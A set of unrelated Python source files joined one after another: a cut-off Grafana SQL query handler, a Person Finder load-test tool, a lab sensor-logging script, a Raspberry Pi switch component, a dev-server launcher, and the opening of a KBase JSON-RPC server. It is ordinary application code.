key_refId = gen_key_refId("dummy", "dummy", fullquery["id"])
# for some reason Grafana sends twice, and this to prevent from running twice on Cloud SQL
# there is a chance that a new query will be sent shortly which override the current
# one - as we can't cancel a launched SQL Query --> so we put in the queue and
# wait a little before before really launch it
# if not grafanaPluginInstances.should_sql_stmt_be_run(key, key_refId, sql_stmt):
# break
# TODO - consider allow users to request 'rerun
rerun = False
# FIXME - the refId can be changed - so it's not a consistent way to track
job_id = None
if "get_result" in fullquery and fullquery["get_result"] is False:
job_id = query_data_noresultback(
key, sql_stmt, rerun=rerun, sqlClient=sqlClient
)
else:
df, job_id = query_data(
key, key_refId, sql_stmt, rerun=rerun, sqlClient=sqlClient
)
if 0:
# FIXME: 'key' and 'key_refId' are not capable of distuingishing
# queries from two panels
# TODO - it's possibel that user decide to change from 'noresult' to
# 'get-result' so we should avoid rerun if possible
# FIXME - the refId can be changed - so it's not a consistent way to track
job_id = grafanaPluginInstances.get_job_id(key, key_refId)
if job_id is None:
df, job_id = query_data(
key,
key_refId,
sql_stmt,
rerun=rerun,
sqlClient=sqlClient,
)
else:
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(
key, thread_safe=True
)
job_status = sqlClient.wait_for_job(job_id, sleep_time=10)
if job_status == "completed":
df = sqlClient.get_result(job_id)
if df is None:
msg = "Query {}: no data returned or query failed due to timeout".format(
fullquery["id"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# a unique reference needs dashboardId + panelid + refid
# TODO : When the webapp is shared by multiple instances of Grafana
# --> maybe the dashboardId and panelId can be the same for those from
# two Grafana instance --> need to resolve this
assert job_id is not None
grafanaPluginInstances.save_job_id(key, key_refId, job_id)
break
except RateLimitedException:
sleep(10)
except TooManyRowsException as e:
msg = "The query returns too many rows - please revise it"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
except NoResultException as e:
msg = "The query returns nothing - please revise it"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if "get_result" in fullquery and fullquery["get_result"] is False:
return None, None
# job_id = sqlClient.submit_sql(sql_stmt, blocking=True)
# ok = False
# while not ok:
# gevent.sleep(20)
# ok = sqlClient.check_job_completion(job_id)
except CosUrlInaccessibleException as e:
msg = "Query {}: Check if you use the right data-source: {}".format(
fullquery["refId"], str(e)
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
except Exception as e:
import traceback
traceback.print_exc()
msg = "Query {}: unknown error {}".format(fullquery["id"], str(e))
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
logger.info("RESULT is available")
if df is None:
# no data returned
msg = "Query {}: No data returned: check the time rang".format(fullquery["id"])
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# make NaN to empty string to so that client can understand
df.replace(np.nan, "", regex=True, inplace=True)
# [TableData] body must be a list, an element is a dict with 3 fields
# . 'type': 'table' or 'timeseries'
# . 'columns': a list of len = number of columns, each element is a dict of 2 entries:
# 'text' : field-name, 'type': a string representatin of 'time',
# 'string', 'number' [a value provided by FieldType in Grafana]
# . 'rows' : a list, of len = number of rows, and each entry is a list of values in one row
# 'series A': [{
# "columns":[
# {"text":"Time","type":"time"},
# {"text":"Country","type":"string"},
# {"text":"Number","type":"number"}
# ],
# "rows":[
# [1234567,"SE",123],
# [1234567,"DE",231],
# [1234567,"US",321]
# ],
# "type":"table"
# }],
# body = json_dumps(tabular_data[series])
time_col = ""
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col in columns_from_to:
time_col = columns_from_to[time_col]
df = revise_time_column(time_col, df)
mdict = {}
# mdict["columns"] = [
# {"text":"user_agent","type":"string"},
# {"text":"Time","type":"time"},
# {"text":"value","type":"number"}
# ]
# TableData
mdict["columns"] = []
y = build_table_schema(df)
for col in y["fields"]:
if col["name"] == "index":
continue
x = {}
x["text"] = col["name"]
stype = ""
if col["type"] in ["integer", "number"]:
stype = "number"
elif col["type"] in ["datetime"] or col["name"] == time_col:
stype = "time"
elif col["type"] in ["string"]:
stype = "string"
elif col["type"] in ["boolean"]:
stype = "boolean"
else:
print("col: ", col["type"])
logger.info("col: ", col["type"])
assert 0
x["type"] = stype
mdict["columns"].append(x)
mdict["rows"] = df.values.tolist()
result = mdict
if DEBUG:
logger.debug("=====")
logger.debug(".. print first 5 rows")
# don't print too long result
import pprint
print(type(result))
print(result)
pprint.pprint(result["columns"], width=1)
pprint.pprint(len(result["rows"]))
# pprint.pprint(result['rows'][1:5], width=1, depth=1)
return result, None
if __name__ == "__main__":
# run(app=app, host='localhost', port=18081,debug=True)
# run(app=app, host='localhost', port=18081, server='gevent')
if cmd_args.ssl is False:
run(app=app, host="0.0.0.0", port=18081, server="gevent")
else:
run(
app=app,
host="0.0.0.0",
port=18081,
server="gevent",
certfile="cert.pem",
keyfile="key.pem",
)
# run(app=app, host='0.0.0.0', port=18081, server='sslwebserver') # asynchronous I/O
# run(app=app, host='0.0.0.0', port=18081, server='wsgiref', reloader=True) # single-threaded
# run(app=app, host='0.0.0.0', port=18081, server='wsgiref') # single-threaded
|
load_test.py
|
#!/usr/bin/python2.7
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A command line tool to perform load test of Person Finder.
Usage:
- Write config.json like this:
{
"base_url": "http://my-person-finder.appspot.com",
"repo": "loadtest1",
"num_records": 100,
"num_queries": 100,
"create_record_qps": 10,
"search_record_qps": 10,
"num_threads": 100,
"output_dir": "/tmp/load_test_result",
"test_mode": false
}
- Run this command to perform load test to create person records:
$ ./tools/load_test config.json create
- Run this command to perform load test to search person records:
$ ./tools/load_test config.json search
- Each of the command above outputs something like this:
Average request latency (sec): 3.815
90%tile request latency (sec): 6.122
Average interval between requests (sec): 0.100
90%tile interval between requests (sec): 0.100
http_status:
200: 5 (100.0%)
"Request latency" shows how long it took to get HTTP responses to create
or search one record.
"Interval between requests" should roughly match the QPS specified in the
config file. If it is much longer than expected, you need to increase
num_threads.
- Don't forget to deactivate the repository in the PF admin page to free up
the datastore for the dummy records.
Config file reference:
base_url:
The base URL of Person Finder app.
repo:
The repository name used to perform load testing. The repository must
not exist before performing load test.
num_records:
The number of records created in "create" test.
num_queries:
The number of queries sent in "search" test.
create_record_qps:
It sends requests in this QPS in "create" test.
search_record_qps:
It sends requests in this QPS in "search" test.
num_threads:
The number of threads to perform the requests. It should be more than
the request latency * QPS.
output_dir:
The path to the directory to output a JSON file with detailed load test
result. You may want to look into this file for more detailed analysis.
test_mode:
If true, allows running "create" test for an existing repository.
"""
from __future__ import print_function
import datetime
import logging
import json
import os
import random
import scrape
import sys
import threading
import time
import traceback
import Queue
from google.appengine.ext import db
import config
import model
import remote_api
class Worker(object):
"""Workers (threads) in WorkerPool."""
def __init__(self):
self.task_queue = Queue.Queue()
self.thread = threading.Thread(target=self.run)
self.thread.start()
def run(self):
while True:
task = self.task_queue.get(block=True)
if not task:
break
task()
def do_async(self, task):
self.task_queue.put(task)
def join(self):
self.task_queue.put(None)
self.thread.join()
class WorkerPool(object):
"""An implementation of a thread pool.
WorkerPool.do_async blocks when all threads are busy. This is different
from typical thread pool implementation
e.g., multiprocessing.pool.ThreadPool. But this behavior is desired for
load testing to keep constant QPS even after threads are temporarily
filled up.
"""
def __init__(self, size):
self.size = size
self.inactive_workers = Queue.Queue()
for _ in xrange(self.size):
self.inactive_workers.put(Worker())
def do_async(self, task, *args):
"""Calls task(*args) asynchronously."""
worker = self.inactive_workers.get(block=True)
def worker_task():
task(*args)
self.inactive_workers.put(worker)
worker.do_async(worker_task)
def join(self):
"""Waits until all tasks finish."""
for _ in xrange(self.size):
worker = self.inactive_workers.get(block=True)
worker.join()
class LoadTest(object):
"""Base class for a load testing job."""
def __init__(self, name, conf):
self.name = name
self.conf = conf
self.data = {
'request_latency_seconds': [],
'request_interval_seconds': [],
'http_statuses': [],
}
def execute_all(self):
"""Calls self.execute_one() for each input returned by
self.generate_input() in QPS specified by self.get_qps().
"""
pool = WorkerPool(self.conf['num_threads'])
for input in self.generate_input():
start_time = datetime.datetime.now()
pool.do_async(self.execute_one_internal, input)
time.sleep(1.0 / self.get_qps())
self.data['request_interval_seconds'].append(
(datetime.datetime.now() - start_time).total_seconds())
pool.join()
def execute_one_internal(self, input):
try:
start_time = datetime.datetime.now()
self.execute_one(input)
end_time = datetime.datetime.now()
self.data['request_latency_seconds'].append(
(end_time - start_time).total_seconds())
except Exception as e:
traceback.print_exc()
def save_result(self):
"""Saves load testing result to a JSON file.
It may be used for more detailed analysis later.
"""
file_name = '%s/%s_%s_result.json' % (
self.conf['output_dir'],
self.name,
datetime.datetime.now().strftime('%Y%m%d_%H%M%S'))
output = {
'conf': self.conf,
'data': self.data,
}
with open(file_name, 'w') as f:
json.dump(output, f)
def print_stats(self):
print()
print ('Average request latency (sec):\t%.3f'
% self.average(self.data['request_latency_seconds']))
print ('90%%tile request latency (sec):\t%.3f'
% self.ninety_percentile(self.data['request_latency_seconds']))
print ('Average interval between requests (sec):\t%.3f'
% self.average(self.data['request_interval_seconds']))
print ('90%%tile interval between requests (sec):\t%.3f'
% self.ninety_percentile(self.data['request_interval_seconds']))
print()
print('http_status:')
http_status_freqs = {}
for status in self.data['http_statuses']:
if status in http_status_freqs:
http_status_freqs[status] += 1
else:
http_status_freqs[status] = 1
for status, freq in http_status_freqs.iteritems():
status_str = str(status) if status else 'Error'
print(' %s: %d (%.1f%%)' % (
status_str, freq, 100.0 * freq / len(self.data['http_statuses'])))
def average(self, deltas):
if deltas:
return sum(deltas, 0.0) / len(deltas)
else:
return float('nan')
def ninety_percentile(self, deltas):
if deltas:
return sorted(deltas)[int(len(deltas) * 0.9)]
else:
return float('nan')
def load_names(self, file_name):
with open(file_name) as f:
return [line.rstrip('\n') for line in f]
class CreateRecordsLoadTest(LoadTest):
"""Load test for creating person records.
It creates records with first num_records entries (specified in conf)
in tests/load_test/names_in_db.txt.
"""
def __init__(self, conf):
super(CreateRecordsLoadTest, self).__init__('create_record', conf)
repo_exists = self.conf['repo'] in model.Repo.list()
if not self.conf['test_mode'] and repo_exists:
raise Exception(
'"create" task must be done against a new repository, but a '
'repository "%s" already exists. If you really want to do '
'this, set "test_mode" to true in the config JSON.'
% self.conf['repo'])
if not repo_exists:
self.create_repo(self.conf['repo'])
scraper = scrape.Session(verbose=1)
self.create_page = scraper.go(
'%s/%s/create?role=provide'
% (self.conf['base_url'], self.conf['repo']))
def get_qps(self):
return self.conf['create_record_qps']
def generate_input(self):
names = (self.load_names('tests/load_test/names_in_db.txt')
[:self.conf['num_records']])
for name in names:
yield name
def execute_one(self, name):
status = None
try:
logging.info('Create record: %s', name)
# Creates a new scrape.Session instance here because scrape.Session
# is not thread-safe. Note that this scraper.go() doesn't cause
# extra HTTP request.
scraper = scrape.Session(verbose=1)
scraper.go(self.create_page)
(given_name, family_name) = name.split(' ')
scraper.submit(
scraper.doc.cssselect_one('form'),
given_name=given_name,
family_name=family_name,
author_name='load_test.py',
text='This is a record created by load_test.py.')
status = scraper.status
finally:
self.data['http_statuses'].append(status)
def create_repo(self, repo):
logging.info('Create repo: %s', repo)
db.put([model.Repo(key_name=repo)])
# Provides some defaults.
config.set_for_repo(
repo,
language_menu_options=['en'],
repo_titles={'en': repo},
keywords='',
use_family_name=True,
use_alternate_names=True,
use_postal_code=True,
allow_believed_dead_via_ui=False,
min_query_word_length=1,
show_profile_entry=False,
profile_websites=[],
map_default_zoom=6,
map_default_center=[0, 0],
map_size_pixels=[400, 280],
read_auth_key_required=True,
search_auth_key_required=True,
deactivated=False,
launched=False,
deactivation_message_html='',
start_page_custom_htmls={},
results_page_custom_htmls={},
view_page_custom_htmls={},
seek_query_form_custom_htmls={},
footer_custom_htmls={},
bad_words='',
published_date=0.0,
updated_date=0.0,
test_mode=False,
force_https=False,
zero_rating_mode=False,
)
class SearchRecordsLoadTest(LoadTest):
"""Load test for searching records.
It searches for given names, family names or full names in equal
probability. The names are taken randomly from:
- the first num_records entries in tests/load_test/names_in_db.txt
- the first num_records entries in tests/load_test/names_not_in_db.txt
"""
def __init__(self, conf):
super(SearchRecordsLoadTest, self).__init__('search_record', conf)
assert self.conf['repo'] in model.Repo.list(), (
'Repository "%s" doesn\'t exist.' % self.conf['repo'])
scraper = scrape.Session(verbose=1)
self.search_page = scraper.go(
'%s/%s/query?role=seek'
% (self.conf['base_url'], self.conf['repo']))
def get_qps(self):
return self.conf['search_record_qps']
def generate_input(self):
r = random.Random()
r.seed(0) # For reproducible result.
full_names = (
self.load_names('tests/load_test/names_in_db.txt')
[:self.conf['num_records']] +
self.load_names('tests/load_test/names_not_in_db.txt')
[:self.conf['num_records']])
given_names = []
family_names = []
for full_name in full_names:
(given_name, family_name) = full_name.split(' ')
given_names.append(given_name)
family_names.append(family_name)
names = full_names + given_names + family_names
for _ in xrange(self.conf['num_queries']):
yield r.choice(names)
def execute_one(self, query):
status = None
try:
logging.info('Search record: %s', query)
scraper = scrape.Session(verbose=1)
scraper.go(self.search_page)
scraper.submit(
scraper.doc.cssselect_one('form'),
query=query)
status = scraper.status
finally:
self.data['http_statuses'].append(status)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
if len(sys.argv) != 3 or sys.argv[2] not in ('create', 'search'):
sys.stderr.write(
'Usage:\n'
'tools/load_test config.json create\n'
'tools/load_test config.json search\n')
with open(sys.argv[1]) as f:
conf = json.load(f)
if not os.path.exists(conf['output_dir']):
os.makedirs(conf['output_dir'])
remote_api.connect(conf['base_url'])
if len(sys.argv) == 3 and sys.argv[2] == 'create':
load_test = CreateRecordsLoadTest(conf)
elif sys.argv[2] == 'search':
load_test = SearchRecordsLoadTest(conf)
else:
raise Exception('Should not happen')
load_test.execute_all()
load_test.save_result()
load_test.print_stats()
|
baking_scd30.py
|
import logging
import sys, os
import numpy as np
import requests.exceptions
sys.path.append('../')
sys.modules['cloudpickle'] = None
import threading
import time
from instruments.scd30 import SCD30
from pymeasure.display.Qt import QtGui
from pymeasure.display.windows import ManagedWindow
from pymeasure.experiment import Procedure, Results
from pymeasure.experiment import IntegerParameter, FloatParameter
from pymeasure.experiment import unique_filename
from instruments.mx200 import MX200
import sched
import datetime
from instruments.inhibitor import WindowsInhibitor
class BakingProcedure(Procedure):
experiment_time = FloatParameter('Experiment Time', units='h', default=1)
interval = FloatParameter('Sampling Interval', units='s', default=1)
__scd: SCD30 = None
__mx200: MX200 = None
__scheduler: sched.scheduler = None
__time_start: datetime.datetime = None
__ndata_points: int = 0
__thread: threading.Thread = None
__on_sleep: WindowsInhibitor = None
__mx200_delay: float = 0.001
port = 'COM3'
__keep_alive: bool = False
__failed_readings = 0
__max_attempts = 10
__previous_reading: dict = None
__previous_pressure: float = None
DATA_COLUMNS = ["Time (h)", "Temperature (C)", r"Relative Humidity (percent)", "CO2 (ppm)",
"Pressure CH1 (Torr)"]
def startup(self):
log.info("Creating BME680.")
self.__scd = SCD30(uri='http://128.54.52.108', username='qwerty', password='12345')
log.info("Setting up Televac MX200")
self.__mx200 = MX200(address=self.port)
self.__mx200_delay = self.__mx200.delay
self.__mx200.units = 'mTorr'
def execute(self):
self.__ndata_points = int(self.experiment_time * 3600 / self.interval)
self.__scheduler = sched.scheduler(timefunc=time.time, delayfunc=time.sleep)
self.__time_start = datetime.datetime.now()
self.__mx200.units = 'mTorr'
# Reset the counter for failed readings
self.__failed_readings = 0
log.info("Starting the loop of {0:d} datapoints.".format(self.__ndata_points))
log.info("Date time at start of measurement: {dt}.".format(dt=self.__time_start))
delay = 0
events = []
n = 1
while delay <= self.experiment_time * 3600:
# event_id = self.__scheduler.enter(delay=delay, priority=1, action=self.get_bme_data, argument=(n,))
bme_event_id = self.__scheduler.enterabs(
time=self.__time_start.timestamp() + delay, priority=1,
action=self.acquire_data, argument=(n,)
)
delay += self.interval
events.append(bme_event_id)
n += 1
self.__thread = threading.Thread(target=self.__scheduler.run)
self.inhibit_sleep()
self.__thread.start()
self.__thread.join()
def shutdown(self):
self.kill_queue()
self.unhinibit_sleep()
def kill_queue(self):
self.unhinibit_sleep()
if self.__scheduler is not None:
for e in self.__scheduler.queue:
try:
self.__scheduler.cancel(e)
except ValueError:
pass
def __del__(self):
self.kill_queue()
def acquire_data(self, n):
if self.should_stop():
log.warning("Caught the stop flag in the procedure")
self.kill_queue()
pressure = self.__mx200.pressure(1)
# If the pressure gives a bad reading (e.g. OVERLOAD) try again
if type(pressure) == str:
if self.__failed_readings < self.__max_attempts:
self.__failed_readings += 1
log.warning("Could not read pressure at time: {0}. Message: {1}".format(
datetime.datetime.now().isoformat(), pressure
))
time.sleep(0.1)
self.acquire_data(n)
else:
log.warning('Error reading pressure. Read out: {0}'.format(pressure))
pressure = self.__previous_pressure if self.__previous_pressure is not None else np.NaN
dt = (datetime.datetime.now() - self.__time_start).total_seconds()
data = {
"Time (h)": dt / 3600.,
"Pressure CH1 (Torr)": pressure
}
self.__previous_pressure = pressure
try:
scd_data = self.__scd.read_env()
except requests.exceptions.ConnectionError as e:
log.warning('Could not access SCD30.')
log.warning(e)
if self.__failed_readings < self.__max_attempts:
self.__failed_readings += 1
log.warning('Attempting to read from SCD30. Attempt number: {0}.'.format(self.__failed_readings))
scd_data = self.__scd.read_env()
else:
if self.__previous_reading is not None:
scd_data = [
{"type": "temperature", "value": self.__previous_reading['Temperature (C)'], "unit": "°C"},
{"type": "humidity", "value": self.__previous_reading['Relative Humidity (percent)'],
"unit": "%"},
{"type": "CO2", "value": self.__previous_reading['CO2 (ppm)'], "unit": "ppm"}
]
self.__failed_readings = 0
else:
# raise requests.exceptions.ConnectionError('Maximum number of reconnects for BME680')
scd_data = [
{"type": "temperature", "value": np.NaN, "unit": "°C"},
{"type": "humidity", "value": np.NaN, "unit": "%"},
{"type": "CO2", "value": np.NaN, "unit": "ppm"}
]
self.__failed_readings = 0
for row in scd_data:
if row['type'] == 'temperature':
data['Temperature (C)'] = row['value']
elif row['type'] == 'humidity':
data['Relative Humidity (percent)'] = row['value']
elif row['type'] == 'CO2':
data['CO2 (ppm)'] = row['value']
self.__failed_readings = 0
self.__previous_reading = data
self.emit('results', data)
self.emit('progress', n * 100. / self.__ndata_points)
log.debug("Emitting results: {0}".format(data))
def inhibit_sleep(self):
if os.name == 'nt' and not self.__keep_alive:
self.__on_sleep = WindowsInhibitor()
self.__on_sleep.inhibit()
self.__keep_alive = True
def unhinibit_sleep(self):
if os.name == 'nt' and self.__keep_alive:
self.__on_sleep.unhinibit()
self.__keep_alive = False
class MainWindow(ManagedWindow):
def __init__(self):
super(MainWindow, self).__init__(
procedure_class=BakingProcedure,
inputs=['experiment_time', 'interval'],
displays=['experiment_time', 'interval'],
x_axis="Time (h)",
y_axis="Pressure CH1 (Torr)",
directory_input=True,
)
self.setWindowTitle('Backing data')
def queue(self):
directory = self.directory
filename = unique_filename(directory, prefix='BAKING_')
log_file = os.path.splitext(filename)[0] + ' .log'
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
fh = logging.FileHandler(log_file)
fh.setFormatter(formatter)
fh.setLevel(logging.DEBUG)
log.addHandler(fh)
procedure = self.make_procedure()
results = Results(procedure, filename)
experiment = self.new_experiment(results)
self.manager.queue(experiment)
if __name__ == "__main__":
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
app = QtGui.QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_())
|
momentary_switch_component.py
|
"""This module contains the MomentarySwitchComponent type."""
import threading
from raspy.argument_null_exception import ArgumentNullException
from raspy.invalid_operation_exception import InvalidOperationException
from raspy.object_disposed_exception import ObjectDisposedException
from raspy.components.switches import switch_state
from raspy.components.switches.momentary_switch import MomentarySwitch
from raspy.components.switches.switch_state_change_event import SwitchStateChangeEvent
from raspy.io import pin_mode
from raspy.io import pin_state
from raspy.io import gpio
from raspy.pi_system import core_utils
OFF_STATE = pin_state.LOW
"""The pin state to consider the switch off."""
ON_STATE = pin_state.HIGH
"""The pin state to consider the switch on."""
class MomentarySwitchComponent(MomentarySwitch):
"""A component that is an abstraction of a momentary switch."""
def __init__(self, pin):
"""Initialize a new instance of MomentarySwitchComponent.
:param gpio.Gpio pin: The input pin the switch is attached to.
:raises: ArgumentNullException if pin is None.
"""
MomentarySwitch.__init__(self)
if pin is None:
raise ArgumentNullException("'pin' param cannot be None.")
self.__isPolling = False
self.__pollThread = None
self.__stopEvent = threading.Event()
self.__stopEvent.set()
self.__pin = pin
self.__pin.provision()
self.__pin.on(gpio.EVENT_GPIO_STATE_CHANGED,
lambda evt: self._on_pin_state_changed(evt))
def _on_pin_state_changed(self, psce):
"""Handle the pin state change event.
This verifies the state has actually changed, then fires the switch
state change event.
:param raspy.io.pin_state_change_event.PinStateChangeEvent psce: The
pin state change event info.
"""
if psce.new_state != psce.old_state:
evt = SwitchStateChangeEvent(switch_state.ON, switch_state.OFF)
if psce.new_state == ON_STATE:
evt = SwitchStateChangeEvent(switch_state.OFF, switch_state.ON)
self.on_switch_state_changed(evt)
@property
def pin(self):
"""Get the GPIO pin this switch is attached to.
:returns: The underlying physical pin.
:rtype: gpio.Gpio
"""
return self.__pin
@property
def state(self):
"""Get the state of the switch.
:returns: The switch state.
:rtype: int
"""
if self.__pin.state == ON_STATE:
return switch_state.ON
return switch_state.OFF
@property
def is_polling(self):
"""Check to see if the switch is in poll mode."""
return self.__isPolling
def _execute_poll(self):
"""Execute the poll cycle."""
while not self.__stopEvent.is_set():
self.__pin.read()
core_utils.sleep(500)
def poll(self):
"""Poll the switch status.
:raises: ObjectDisposedException if this instance has been disposed.
:raises: InvalidOperationException if this switch is attached to a
pin that has not been configured as an input.
"""
if self.is_disposed:
raise ObjectDisposedException("SwitchComponent")
if self.__pin.mode != pin_mode.IN:
msg = "The pin this switch is attached to must be configured"
msg += " as an input."
raise InvalidOperationException(msg)
if self.__isPolling:
return
self.__stopEvent.clear()
self.__isPolling = True
self.__pollThread = threading.Thread(target=self._execute_poll)
self.__pollThread.name = "MomentarySwitchComponentPollThread"
self.__pollThread.daemon = True
self.__pollThread.start()
def interrupt_poll(self):
"""Interrupt the poll cycle."""
if not self.__isPolling or self.is_disposed:
return
if self.__stopEvent.is_set() or self.__pollThread is None:
return
self.__stopEvent.set()
self.__isPolling = False
def dispose(self):
"""Release managed resources used by this component."""
if self.is_disposed:
return
self.interrupt_poll()
if self.__pin is not None:
self.__pin.dispose()
self.__pin = None
self.__stopEvent = None
self.__pollThread = None
MomentarySwitch.dispose(self)
|
runweb.py
|
"""This file is for dev server only.
DO NOT USE FOR PROD
"""
from gevent import monkey
monkey.patch_all()
from lib.patch import patch_all
patch_all()
import multiprocessing
import os
import shlex
import sys
import subprocess
import gevent.pywsgi
import gevent.socket
from app.server import flask_app
def main():
host = "0.0.0.0"
port = 5000
if len(sys.argv) > 1:
port = int(sys.argv[-1])
debug = "--debug" in sys.argv
run_webpack = "--webpack" in sys.argv
webpack_process = None
if debug:
from flask_compress import Compress
Compress(flask_app)
# We are on the parent process
if os.environ.get("WERKZEUG_RUN_MAIN") != "true":
if run_webpack:
webpack_process = multiprocessing.Process(target=webpack)
webpack_process.start()
else:
print("Webpack is disabled. html/js/css will not be built.")
print("To make web files: python runweb.py --debug --webpack port")
else:
print("You are not running in debug mode, so files are not autoreloaded.")
print("To run in debug mode: python runweb.py --debug port")
try:
socketio_server(host=host, port=port, debug=debug)
finally:
terminate_process_if_live(webpack_process)
def socketio_server(host="0.0.0.0", port=5000, debug=False):
from app.flask_app import socketio
gevent.socket.setdefaulttimeout(30000)
print("Running Querybook(w/ socketio) in port: {}".format(port))
socketio.run(flask_app, host=host, port=port, debug=debug)
def webpack():
webpack_subprocess = subprocess.Popen(
shlex.split("./node_modules/.bin/webpack --progress --colors --watch"),
stdout=subprocess.PIPE,
)
while True:
output = webpack_subprocess.stdout.readline()
if output == "" and webpack_subprocess.poll() is not None:
break
if output:
sys.stdout.write(output.decode("utf-8"))
def terminate_process_if_live(process):
if process is not None and process.is_alive():
process.terminate()
if __name__ == "__main__":
main()
|
kb_JobStatsServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from kb_JobStats.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_JobStats'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_JobStats.kb_JobStatsImpl import kb_JobStats # noqa @IgnorePep8
impl_kb_JobStats = kb_JobStats(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
